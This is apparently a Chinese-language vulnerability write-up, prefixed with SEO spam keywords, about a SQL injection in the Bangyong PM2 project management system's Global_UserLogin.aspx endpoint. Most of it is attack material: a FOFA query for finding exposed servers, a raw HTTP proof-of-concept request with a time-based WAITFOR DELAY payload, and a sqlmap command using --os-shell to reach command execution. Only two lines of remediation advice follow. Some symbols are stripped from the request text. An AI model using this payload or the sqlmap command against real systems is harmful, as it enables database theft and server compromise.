哪家做网站公司最好,三合一 网站 前端,网页版传奇世界羽翼升级,微信公众号seo0x01 产品简介 邦永PM2项目管理系统科学地将项目管理思想和方法和谐、统一#xff0c;使得长期以来困扰项目管理工作者的工期、进度、投资和成本情况无法整体动态管理的问题得到了全面而彻底的解决。
0x02 漏洞概述 邦永科技PM2项目管理平台Global_UserLogin.aspx接口处未对用…0x01 产品简介 邦永PM2项目管理系统科学地将项目管理思想和方法和谐、统一使得长期以来困扰项目管理工作者的工期、进度、投资和成本情况无法整体动态管理的问题得到了全面而彻底的解决。
0x02 漏洞概述 邦永科技PM2项目管理平台Global_UserLogin.aspx接口处未对用户传入的参数未进行有效的过滤直接拼接至SQL查询的语句中导致SQL注入漏洞攻击者可利用该漏洞获取数据库的敏感信息深入利用可造成服务器失陷。
0x03 复现环境
FOFAbodyPM2项目管理系统BS版增强工具.zip 0x04 漏洞复现
PoC
GET /Global/Global_UserLogin.aspx?accId1%27%3BWAITFORDELAY%270%3A0%3A5%27--loginCodepasswordtype HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
延时5秒 Sqlmap利用
python3 sqlmap.py -u http://your-ip/Global/Global_UserLogin.aspx?accId1*loginCodepasswordtype --os-shell
命令执行 0x05 修复建议
关闭互联网暴露面或接口设置外部访问权限
升级至安全版本
